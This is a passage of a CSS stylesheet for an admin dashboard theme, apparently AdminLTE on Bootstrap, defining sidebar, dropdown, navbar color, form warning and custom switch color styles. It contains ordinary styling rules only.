.control-sidebar-dark .nav-tabs .nav-link, .control-sidebar-dark .nav-tabs .nav-link:hover, .control-sidebar-dark .nav-tabs .nav-link:active, .control-sidebar-dark .nav-tabs .nav-link:focus, .control-sidebar-dark .nav-tabs .nav-link.active {
border: 0;
}
.control-sidebar-dark .nav-tabs .nav-link:hover, .control-sidebar-dark .nav-tabs .nav-link:active, .control-sidebar-dark .nav-tabs .nav-link:focus, .control-sidebar-dark .nav-tabs .nav-link.active {
border-bottom-color: transparent;
border-left-color: transparent;
border-top-color: transparent;
color: #ffffff;
}
.control-sidebar-dark .nav-tabs .nav-link.active {
background-color: #343a40;
}
.control-sidebar-dark .tab-pane {
padding: 10px 15px;
}
.control-sidebar-light {
color: #4b545c;
}
.control-sidebar-light {
background: #ffffff;
border-left: 1px solid #dee2e6;
}
.text-sm .dropdown-menu {
font-size: 0.875rem !important;
}
.text-sm .dropdown-toggle::after {
vertical-align: .2rem;
}
.dropdown-item-title {
font-size: 1rem;
margin: 0;
}
.dropdown-icon::after {
margin-left: 0;
}
.dropdown-menu-lg {
max-width: 300px;
min-width: 280px;
padding: 0;
}
.dropdown-menu-lg .dropdown-divider {
margin: 0;
}
.dropdown-menu-lg .dropdown-item {
padding: 0.5rem 1rem;
}
.dropdown-menu-lg p {
margin: 0;
white-space: normal;
}
.dropdown-submenu {
position: relative;
}
.dropdown-submenu > a:after {
border-top: 0.3em solid transparent;
border-right: 0;
border-bottom: 0.3em solid transparent;
border-left: 0.3em solid;
float: right;
margin-left: .5rem;
margin-top: .5rem;
}
.dropdown-submenu > .dropdown-menu {
left: 100%;
margin-left: 0px;
margin-top: 0px;
top: 0;
}
.dropdown-hover:hover > .dropdown-menu, .dropdown-hover.nav-item.dropdown:hover > .dropdown-menu,
.dropdown-hover .dropdown-submenu:hover > .dropdown-menu, .dropdown-hover.dropdown-submenu:hover > .dropdown-menu {
display: block;
}
.dropdown-menu-xl {
max-width: 420px;
min-width: 360px;
padding: 0;
}
.dropdown-menu-xl .dropdown-divider {
margin: 0;
}
.dropdown-menu-xl .dropdown-item {
padding: 0.5rem 1rem;
}
.dropdown-menu-xl p {
margin: 0;
white-space: normal;
}
.dropdown-footer,
.dropdown-header {
display: block;
font-size: 0.875rem;
padding: 0.5rem 1rem;
text-align: center;
}
.open:not(.dropup) > .animated-dropdown-menu {
-webkit-animation: flipInX 0.7s both;
animation: flipInX 0.7s both;
-webkit-backface-visibility: visible !important;
backface-visibility: visible !important;
}
@-webkit-keyframes flipInX {
0% {
-webkit-transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
transition-timing-function: ease-in;
opacity: 0;
}
40% {
-webkit-transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
transition-timing-function: ease-in;
}
60% {
-webkit-transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
opacity: 1;
}
80% {
-webkit-transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
}
100% {
-webkit-transform: perspective(400px);
transform: perspective(400px);
}
}
@keyframes flipInX {
0% {
-webkit-transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
transition-timing-function: ease-in;
opacity: 0;
}
40% {
-webkit-transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
transition-timing-function: ease-in;
}
60% {
-webkit-transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
opacity: 1;
}
80% {
-webkit-transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
}
100% {
-webkit-transform: perspective(400px);
transform: perspective(400px);
}
}
.navbar-custom-menu > .navbar-nav > li {
position: relative;
}
.navbar-custom-menu > .navbar-nav > li > .dropdown-menu {
position: absolute;
right: 0;
left: auto;
}
@media (max-width: 767.98px) {
.navbar-custom-menu > .navbar-nav {
float: right;
}
.navbar-custom-menu > .navbar-nav > li {
position: static;
}
.navbar-custom-menu > .navbar-nav > li > .dropdown-menu {
position: absolute;
right: 5%;
left: auto;
border: 1px solid #ddd;
background: #ffffff;
}
}
.navbar-nav > .user-menu > .nav-link:after {
content: none;
}
.navbar-nav > .user-menu > .dropdown-menu {
border-top-left-radius: 0;
border-top-right-radius: 0;
padding: 0;
width: 280px;
}
.navbar-nav > .user-menu > .dropdown-menu,
.navbar-nav > .user-menu > .dropdown-menu > .user-body {
border-bottom-right-radius: 4px;
border-bottom-left-radius: 4px;
}
.navbar-nav > .user-menu > .dropdown-menu > li.user-header {
height: 175px;
padding: 10px;
text-align: center;
}
.navbar-nav > .user-menu > .dropdown-menu > li.user-header > img {
z-index: 5;
height: 90px;
width: 90px;
border: 3px solid;
border-color: transparent;
border-color: rgba(255, 255, 255, 0.2);
}
.navbar-nav > .user-menu > .dropdown-menu > li.user-header > p {
z-index: 5;
font-size: 17px;
margin-top: 10px;
}
.navbar-nav > .user-menu > .dropdown-menu > li.user-header > p > small {
display: block;
font-size: 12px;
}
.navbar-nav > .user-menu > .dropdown-menu > .user-body {
border-bottom: 1px solid #495057;
border-top: 1px solid #dee2e6;
padding: 15px;
}
.navbar-nav > .user-menu > .dropdown-menu > .user-body::after {
display: block;
clear: both;
content: "";
}
@media (min-width: 576px) {
.navbar-nav > .user-menu > .dropdown-menu > .user-body a {
background: #ffffff !important;
color: #495057 !important;
}
}
.navbar-nav > .user-menu > .dropdown-menu > .user-footer {
background-color: #f8f9fa;
padding: 10px;
}
.navbar-nav > .user-menu > .dropdown-menu > .user-footer::after {
display: block;
clear: both;
content: "";
}
.navbar-nav > .user-menu > .dropdown-menu > .user-footer .btn-default {
color: #6c757d;
}
@media (min-width: 576px) {
.navbar-nav > .user-menu > .dropdown-menu > .user-footer .btn-default:hover {
background-color: #f8f9fa;
}
}
.navbar-nav > .user-menu .user-image {
border-radius: 50%;
float: left;
height: 2.1rem;
margin-right: 10px;
margin-top: -2px;
width: 2.1rem;
}
@media (min-width: 576px) {
.navbar-nav > .user-menu .user-image {
float: none;
line-height: 10px;
margin-right: .4rem;
margin-top: -8px;
}
}
.nav-pills .nav-link {
color: #6c757d;
}
.nav-pills .nav-link:not(.active):hover {
color: #007bff;
}
.nav-pills .nav-item.dropdown.show .nav-link:hover {
color: #ffffff;
}
.nav-tabs.flex-column {
border-bottom: 0;
border-right: 1px solid #dee2e6;
}
.nav-tabs.flex-column .nav-link {
border-bottom-left-radius: 0.25rem;
border-top-right-radius: 0;
margin-right: -1px;
}
.nav-tabs.flex-column .nav-link:hover, .nav-tabs.flex-column .nav-link:focus {
border-color: #e9ecef transparent #e9ecef #e9ecef;
}
.nav-tabs.flex-column .nav-link.active,
.nav-tabs.flex-column .nav-item.show .nav-link {
border-color: #dee2e6 transparent #dee2e6 #dee2e6;
}
.nav-tabs.flex-column.nav-tabs-right {
border-left: 1px solid #dee2e6;
border-right: 0;
}
.nav-tabs.flex-column.nav-tabs-right .nav-link {
border-bottom-left-radius: 0;
border-bottom-right-radius: 0.25rem;
border-top-left-radius: 0;
border-top-right-radius: 0.25rem;
margin-left: -1px;
}
.nav-tabs.flex-column.nav-tabs-right .nav-link:hover, .nav-tabs.flex-column.nav-tabs-right .nav-link:focus {
border-color: #e9ecef #e9ecef #e9ecef transparent;
}
.nav-tabs.flex-column.nav-tabs-right .nav-link.active,
.nav-tabs.flex-column.nav-tabs-right .nav-item.show .nav-link {
border-color: #dee2e6 #dee2e6 #dee2e6 transparent;
}
.navbar-no-expand {
-ms-flex-direction: row;
flex-direction: row;
}
.navbar-no-expand .nav-link {
padding-left: 1rem;
padding-right: 1rem;
}
.navbar-no-expand .dropdown-menu {
position: absolute;
}
.navbar-light {
background-color: #f8f9fa;
}
.navbar-dark {
background-color: #343a40;
}
.navbar-primary {
background-color: #007bff;
}
.navbar-secondary {
background-color: #6c757d;
}
.navbar-success {
background-color: #28a745;
}
.navbar-info {
background-color: #17a2b8;
}
.navbar-warning {
background-color: #ffc107;
}
.navbar-danger {
background-color: #dc3545;
}
.navbar-lightblue {
background-color: #3c8dbc;
}
.navbar-navy {
background-color: #001f3f;
}
.navbar-olive {
background-color: #3d9970;
}
.navbar-lime {
background-color: #01ff70;
}
.navbar-fuchsia {
background-color: #f012be;
}
.navbar-maroon {
background-color: #d81b60;
}
.navbar-blue {
background-color: #007bff;
}
.navbar-indigo {
background-color: #6610f2;
}
.navbar-purple {
background-color: #6f42c1;
}
.navbar-pink {
background-color: #e83e8c;
}
.navbar-red {
background-color: #dc3545;
}
.navbar-orange {
background-color: #fd7e14;
}
.navbar-yellow {
background-color: #ffc107;
}
.navbar-green {
background-color: #28a745;
}
.navbar-teal {
background-color: #20c997;
}
.navbar-cyan {
background-color: #17a2b8;
}
.navbar-white {
background-color: #ffffff;
}
.navbar-gray {
background-color: #6c757d;
}
.navbar-gray-dark {
background-color: #343a40;
}
.form-group.has-icon {
position: relative;
}
.form-group.has-icon .form-control {
padding-right: 35px;
}
.form-group.has-icon .form-icon {
background-color: transparent;
border: 0;
cursor: pointer;
font-size: 1rem;
padding: 0.375rem 0.75rem;
position: absolute;
right: 3px;
top: 0;
}
.btn-group-vertical .btn.btn-flat:first-of-type, .btn-group-vertical .btn.btn-flat:last-of-type {
border-radius: 0;
}
.form-control-feedback.fa, .form-control-feedback.fas, .form-control-feedback.far, .form-control-feedback.fab, .form-control-feedback.glyphicon, .form-control-feedback.ion {
line-height: calc(2.25rem + 2px);
}
.input-lg + .form-control-feedback.fa, .input-lg + .form-control-feedback.fas, .input-lg + .form-control-feedback.far, .input-lg + .form-control-feedback.fab, .input-lg + .form-control-feedback.glyphicon, .input-lg + .form-control-feedback.ion,
.input-group-lg + .form-control-feedback.fa,
.input-group-lg + .form-control-feedback.fas,
.input-group-lg + .form-control-feedback.far,
.input-group-lg + .form-control-feedback.fab,
.input-group-lg + .form-control-feedback.glyphicon,
.input-group-lg + .form-control-feedback.ion {
line-height: calc(2.875rem + 2px);
}
.form-group-lg .form-control + .form-control-feedback.fa, .form-group-lg .form-control + .form-control-feedback.fas, .form-group-lg .form-control + .form-control-feedback.far, .form-group-lg .form-control + .form-control-feedback.fab, .form-group-lg .form-control + .form-control-feedback.glyphicon, .form-group-lg .form-control + .form-control-feedback.ion {
line-height: calc(2.875rem + 2px);
}
.input-sm + .form-control-feedback.fa, .input-sm + .form-control-feedback.fas, .input-sm + .form-control-feedback.far, .input-sm + .form-control-feedback.fab, .input-sm + .form-control-feedback.glyphicon, .input-sm + .form-control-feedback.ion,
.input-group-sm + .form-control-feedback.fa,
.input-group-sm + .form-control-feedback.fas,
.input-group-sm + .form-control-feedback.far,
.input-group-sm + .form-control-feedback.fab,
.input-group-sm + .form-control-feedback.glyphicon,
.input-group-sm + .form-control-feedback.ion {
line-height: calc(1.8125rem + 2px);
}
.form-group-sm .form-control + .form-control-feedback.fa, .form-group-sm .form-control + .form-control-feedback.fas, .form-group-sm .form-control + .form-control-feedback.far, .form-group-sm .form-control + .form-control-feedback.fab, .form-group-sm .form-control + .form-control-feedback.glyphicon, .form-group-sm .form-control + .form-control-feedback.ion {
line-height: calc(1.8125rem + 2px);
}
label:not(.form-check-label):not(.custom-file-label) {
font-weight: 700;
}
.warning-feedback {
font-size: 80%;
color: #ffc107;
display: none;
margin-top: 0.25rem;
width: 100%;
}
.warning-tooltip {
border-radius: 0.25rem;
font-size: 0.875rem;
background-color: rgba(255, 193, 7, 0.9);
color: #1F2D3D;
display: none;
line-height: 1.5;
margin-top: .1rem;
max-width: 100%;
padding: 0.25rem 0.5rem;
position: absolute;
top: 100%;
z-index: 5;
}
.form-control.is-warning {
border-color: #ffc107;
}
.form-control.is-warning:focus {
border-color: #ffc107;
box-shadow: 0 0 0 0 rgba(255, 193, 7, 0.25);
}
.form-control.is-warning ~ .warning-feedback,
.form-control.is-warning ~ .warning-tooltip {
display: block;
}
textarea.form-control.is-warning {
padding-right: 2.25rem;
background-position: top calc(0.375em + 0.1875rem) right calc(0.375em + 0.1875rem);
}
.custom-select.is-warning {
border-color: #ffc107;
}
.custom-select.is-warning:focus {
border-color: #ffc107;
box-shadow: 0 0 0 0 rgba(255, 193, 7, 0.25);
}
.custom-select.is-warning ~ .warning-feedback,
.custom-select.is-warning ~ .warning-tooltip {
display: block;
}
.form-control-file.is-warning ~ .warning-feedback,
.form-control-file.is-warning ~ .warning-tooltip {
display: block;
}
.form-check-input.is-warning ~ .form-check-label {
color: #ffc107;
}
.form-check-input.is-warning ~ .warning-feedback,
.form-check-input.is-warning ~ .warning-tooltip {
display: block;
}
.custom-control-input.is-warning ~ .custom-control-label {
color: #ffc107;
}
.custom-control-input.is-warning ~ .custom-control-label::before {
border-color: #ffc107;
}
.custom-control-input.is-warning ~ .warning-feedback,
.custom-control-input.is-warning ~ .warning-tooltip {
display: block;
}
.custom-control-input.is-warning:checked ~ .custom-control-label::before {
background-color: #ffce3a;
border-color: #ffce3a;
}
.custom-control-input.is-warning:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 0 rgba(255, 193, 7, 0.25);
}
.custom-control-input.is-warning:focus:not(:checked) ~ .custom-control-label::before {
border-color: #ffc107;
}
.custom-file-input.is-warning ~ .custom-file-label {
border-color: #ffc107;
}
.custom-file-input.is-warning ~ .warning-feedback,
.custom-file-input.is-warning ~ .warning-tooltip {
display: block;
}
.custom-file-input.is-warning:focus ~ .custom-file-label {
border-color: #ffc107;
box-shadow: 0 0 0 0 rgba(255, 193, 7, 0.25);
}
.custom-switch.custom-switch-off-primary .custom-control-input ~ .custom-control-label::before {
background: #007bff;
border-color: #004a99;
}
.custom-switch.custom-switch-off-primary .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-switch.custom-switch-off-primary .custom-control-input ~ .custom-control-label::after {
background: #003e80;
}
.custom-switch.custom-switch-on-primary .custom-control-input:checked ~ .custom-control-label::before {
background: #007bff;
border-color: #004a99;
}
.custom-switch.custom-switch-on-primary .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-switch.custom-switch-on-primary .custom-control-input:checked ~ .custom-control-label::after {
background: #99caff;
}
.custom-switch.custom-switch-off-secondary .custom-control-input ~ .custom-control-label::before {
background: #6c757d;
border-color: #3d4246;
}
.custom-switch.custom-switch-off-secondary .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-switch.custom-switch-off-secondary .custom-control-input ~ .custom-control-label::after {
background: #313539;
}
.custom-switch.custom-switch-on-secondary .custom-control-input:checked ~ .custom-control-label::before {
background: #6c757d;
border-color: #3d4246;
}
.custom-switch.custom-switch-on-secondary .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(108, 117, 125, 0.25);
}
.custom-switch.custom-switch-on-secondary .custom-control-input:checked ~ .custom-control-label::after {
background: #bcc1c6;
}
.custom-switch.custom-switch-off-success .custom-control-input ~ .custom-control-label::before {
background: #28a745;
border-color: #145523;
}
.custom-switch.custom-switch-off-success .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-switch.custom-switch-off-success .custom-control-input ~ .custom-control-label::after {
background: #0f401b;
}
.custom-switch.custom-switch-on-success .custom-control-input:checked ~ .custom-control-label::before {
background: #28a745;
border-color: #145523;
}
.custom-switch.custom-switch-on-success .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(40, 167, 69, 0.25);
}
.custom-switch.custom-switch-on-success .custom-control-input:checked ~ .custom-control-label::after {
background: #86e29b;
}
.custom-switch.custom-switch-off-info .custom-control-input ~ .custom-control-label::before {
background: #17a2b8;
border-color: #0c525d;
}
.custom-switch.custom-switch-off-info .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-switch.custom-switch-off-info .custom-control-input ~ .custom-control-label::after {
background: #093e47;
}
.custom-switch.custom-switch-on-info .custom-control-input:checked ~ .custom-control-label::before {
background: #17a2b8;
border-color: #0c525d;
}
.custom-switch.custom-switch-on-info .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(23, 162, 184, 0.25);
}
.custom-switch.custom-switch-on-info .custom-control-input:checked ~ .custom-control-label::after {
background: #7adeee;
}
.custom-switch.custom-switch-off-warning .custom-control-input ~ .custom-control-label::before {
background: #ffc107;
border-color: #a07800;
}
.custom-switch.custom-switch-off-warning .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-switch.custom-switch-off-warning .custom-control-input ~ .custom-control-label::after {
background: #876500;
}
.custom-switch.custom-switch-on-warning .custom-control-input:checked ~ .custom-control-label::before {
background: #ffc107;
border-color: #a07800;
}
.custom-switch.custom-switch-on-warning .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(255, 193, 7, 0.25);
}
.custom-switch.custom-switch-on-warning .custom-control-input:checked ~ .custom-control-label::after {
background: #ffe7a0;
}
.custom-switch.custom-switch-off-danger .custom-control-input ~ .custom-control-label::before {
background: #dc3545;
border-color: #921925;
}
.custom-switch.custom-switch-off-danger .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-switch.custom-switch-off-danger .custom-control-input ~ .custom-control-label::after {
background: #7c151f;
}
.custom-switch.custom-switch-on-danger .custom-control-input:checked ~ .custom-control-label::before {
background: #dc3545;
border-color: #921925;
}
.custom-switch.custom-switch-on-danger .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-switch.custom-switch-on-danger .custom-control-input:checked ~ .custom-control-label::after {
background: #f3b7bd;
}
.custom-switch.custom-switch-off-light .custom-control-input ~ .custom-control-label::before {
background: #f8f9fa;
border-color: #bdc6d0;
}
.custom-switch.custom-switch-off-light .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(248, 249, 250, 0.25);
}
.custom-switch.custom-switch-off-light .custom-control-input ~ .custom-control-label::after {
background: #aeb9c5;
}
.custom-switch.custom-switch-on-light .custom-control-input:checked ~ .custom-control-label::before {
background: #f8f9fa;
border-color: #bdc6d0;
}
.custom-switch.custom-switch-on-light .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(248, 249, 250, 0.25);
}
.custom-switch.custom-switch-on-light .custom-control-input:checked ~ .custom-control-label::after {
background: white;
}
.custom-switch.custom-switch-off-dark .custom-control-input ~ .custom-control-label::before {
background: #343a40;
border-color: #060708;
}
.custom-switch.custom-switch-off-dark .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-switch.custom-switch-off-dark .custom-control-input ~ .custom-control-label::after {
background: black;
}
.custom-switch.custom-switch-on-dark .custom-control-input:checked ~ .custom-control-label::before {
background: #343a40;
border-color: #060708;
}
.custom-switch.custom-switch-on-dark .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(52, 58, 64, 0.25);
}
.custom-switch.custom-switch-on-dark .custom-control-input:checked ~ .custom-control-label::after {
background: #7a8793;
}
.custom-switch.custom-switch-off-lightblue .custom-control-input ~ .custom-control-label::before {
background: #3c8dbc;
border-color: #23536f;
}
.custom-switch.custom-switch-off-lightblue .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(60, 141, 188, 0.25);
}
.custom-switch.custom-switch-off-lightblue .custom-control-input ~ .custom-control-label::after {
background: #1d455b;
}
.custom-switch.custom-switch-on-lightblue .custom-control-input:checked ~ .custom-control-label::before {
background: #3c8dbc;
border-color: #23536f;
}
.custom-switch.custom-switch-on-lightblue .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(60, 141, 188, 0.25);
}
.custom-switch.custom-switch-on-lightblue .custom-control-input:checked ~ .custom-control-label::after {
background: #acd0e5;
}
.custom-switch.custom-switch-off-navy .custom-control-input ~ .custom-control-label::before {
background: #001f3f;
border-color: black;
}
.custom-switch.custom-switch-off-navy .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 31, 63, 0.25);
}
.custom-switch.custom-switch-off-navy .custom-control-input ~ .custom-control-label::after {
background: black;
}
.custom-switch.custom-switch-on-navy .custom-control-input:checked ~ .custom-control-label::before {
background: #001f3f;
border-color: black;
}
.custom-switch.custom-switch-on-navy .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 31, 63, 0.25);
}
.custom-switch.custom-switch-on-navy .custom-control-input:checked ~ .custom-control-label::after {
background: #006ad8;
}
.custom-switch.custom-switch-off-olive .custom-control-input ~ .custom-control-label::before {
background: #3d9970;
border-color: #20503b;
}
.custom-switch.custom-switch-off-olive .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(61, 153, 112, 0.25);
}
.custom-switch.custom-switch-off-olive .custom-control-input ~ .custom-control-label::after {
background: #193e2d;
}
.custom-switch.custom-switch-on-olive .custom-control-input:checked ~ .custom-control-label::before {
background: #3d9970;
border-color: #20503b;
}
.custom-switch.custom-switch-on-olive .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(61, 153, 112, 0.25);
}
.custom-switch.custom-switch-on-olive .custom-control-input:checked ~ .custom-control-label::after {
background: #99d6bb;
}
.custom-switch.custom-switch-off-lime .custom-control-input ~ .custom-control-label::before {
background: #01ff70;
border-color: #009a43;
}
.custom-switch.custom-switch-off-lime .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(1, 255, 112, 0.25);
}
.custom-switch.custom-switch-off-lime .custom-control-input ~ .custom-control-label::after {
background: #008138;
}
.custom-switch.custom-switch-on-lime .custom-control-input:checked ~ .custom-control-label::before {
background: #01ff70;
border-color: #009a43;
}
.custom-switch.custom-switch-on-lime .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(1, 255, 112, 0.25);
}
.custom-switch.custom-switch-on-lime .custom-control-input:checked ~ .custom-control-label::after {
background: #9affc6;
}
.custom-switch.custom-switch-off-fuchsia .custom-control-input ~ .custom-control-label::before {
background: #f012be;
border-color: #930974;
}
.custom-switch.custom-switch-off-fuchsia .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(240, 18, 190, 0.25);
}
.custom-switch.custom-switch-off-fuchsia .custom-control-input ~ .custom-control-label::after {
background: #7b0861;
}
.custom-switch.custom-switch-on-fuchsia .custom-control-input:checked ~ .custom-control-label::before {
background: #f012be;
border-color: #930974;
}
.custom-switch.custom-switch-on-fuchsia .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(240, 18, 190, 0.25);
}
.custom-switch.custom-switch-on-fuchsia .custom-control-input:checked ~ .custom-control-label::after {
background: #f9a2e5;
}
.custom-switch.custom-switch-off-maroon .custom-control-input ~ .custom-control-label::before {
background: #d81b60;
border-color: #7d1038;
}
.custom-switch.custom-switch-off-maroon .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(216, 27, 96, 0.25);
}
.custom-switch.custom-switch-off-maroon .custom-control-input ~ .custom-control-label::after {
background: #670d2e;
}
.custom-switch.custom-switch-on-maroon .custom-control-input:checked ~ .custom-control-label::before {
background: #d81b60;
border-color: #7d1038;
}
.custom-switch.custom-switch-on-maroon .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(216, 27, 96, 0.25);
}
.custom-switch.custom-switch-on-maroon .custom-control-input:checked ~ .custom-control-label::after {
background: #f29aba;
}
.custom-switch.custom-switch-off-blue .custom-control-input ~ .custom-control-label::before {
background: #007bff;
border-color: #004a99;
}
.custom-switch.custom-switch-off-blue .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-switch.custom-switch-off-blue .custom-control-input ~ .custom-control-label::after {
background: #003e80;
}
.custom-switch.custom-switch-on-blue .custom-control-input:checked ~ .custom-control-label::before {
background: #007bff;
border-color: #004a99;
}
.custom-switch.custom-switch-on-blue .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(0, 123, 255, 0.25);
}
.custom-switch.custom-switch-on-blue .custom-control-input:checked ~ .custom-control-label::after {
background: #99caff;
}
.custom-switch.custom-switch-off-indigo .custom-control-input ~ .custom-control-label::before {
background: #6610f2;
border-color: #3d0894;
}
.custom-switch.custom-switch-off-indigo .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(102, 16, 242, 0.25);
}
.custom-switch.custom-switch-off-indigo .custom-control-input ~ .custom-control-label::after {
background: #33077c;
}
.custom-switch.custom-switch-on-indigo .custom-control-input:checked ~ .custom-control-label::before {
background: #6610f2;
border-color: #3d0894;
}
.custom-switch.custom-switch-on-indigo .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(102, 16, 242, 0.25);
}
.custom-switch.custom-switch-on-indigo .custom-control-input:checked ~ .custom-control-label::after {
background: #c3a1fa;
}
.custom-switch.custom-switch-off-purple .custom-control-input ~ .custom-control-label::before {
background: #6f42c1;
border-color: #432776;
}
.custom-switch.custom-switch-off-purple .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(111, 66, 193, 0.25);
}
.custom-switch.custom-switch-off-purple .custom-control-input ~ .custom-control-label::after {
background: #382063;
}
.custom-switch.custom-switch-on-purple .custom-control-input:checked ~ .custom-control-label::before {
background: #6f42c1;
border-color: #432776;
}
.custom-switch.custom-switch-on-purple .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(111, 66, 193, 0.25);
}
.custom-switch.custom-switch-on-purple .custom-control-input:checked ~ .custom-control-label::after {
background: #c7b5e7;
}
.custom-switch.custom-switch-off-pink .custom-control-input ~ .custom-control-label::before {
background: #e83e8c;
border-color: #ac145a;
}
.custom-switch.custom-switch-off-pink .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(232, 62, 140, 0.25);
}
.custom-switch.custom-switch-off-pink .custom-control-input ~ .custom-control-label::after {
background: #95124e;
}
.custom-switch.custom-switch-on-pink .custom-control-input:checked ~ .custom-control-label::before {
background: #e83e8c;
border-color: #ac145a;
}
.custom-switch.custom-switch-on-pink .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(232, 62, 140, 0.25);
}
.custom-switch.custom-switch-on-pink .custom-control-input:checked ~ .custom-control-label::after {
background: #f8c7dd;
}
.custom-switch.custom-switch-off-red .custom-control-input ~ .custom-control-label::before {
background: #dc3545;
border-color: #921925;
}
.custom-switch.custom-switch-off-red .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-switch.custom-switch-off-red .custom-control-input ~ .custom-control-label::after {
background: #7c151f;
}
.custom-switch.custom-switch-on-red .custom-control-input:checked ~ .custom-control-label::before {
background: #dc3545;
border-color: #921925;
}
.custom-switch.custom-switch-on-red .custom-control-input:checked:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(220, 53, 69, 0.25);
}
.custom-switch.custom-switch-on-red .custom-control-input:checked ~ .custom-control-label::after {
background: #f3b7bd;
}
.custom-switch.custom-switch-off-orange .custom-control-input ~ .custom-control-label::before {
background: #fd7e14;
border-color: #aa4e01;
}
.custom-switch.custom-switch-off-orange .custom-control-input:focus ~ .custom-control-label::before {
box-shadow: 0 0 0 1px #ffffff, 0 0 0 2px rgba(253, 126, 20, 0.25);
}
.custom-switch.custom-switch-off-orange .custom-control-input ~ .custom-control-label::after {
background: #904201;
}
.custom-switch.custom-switch-on-orange .custom-control-input:checked ~ .custom-control-label::before {
background: #fd7e14;
border-color: #aa4e01;
}
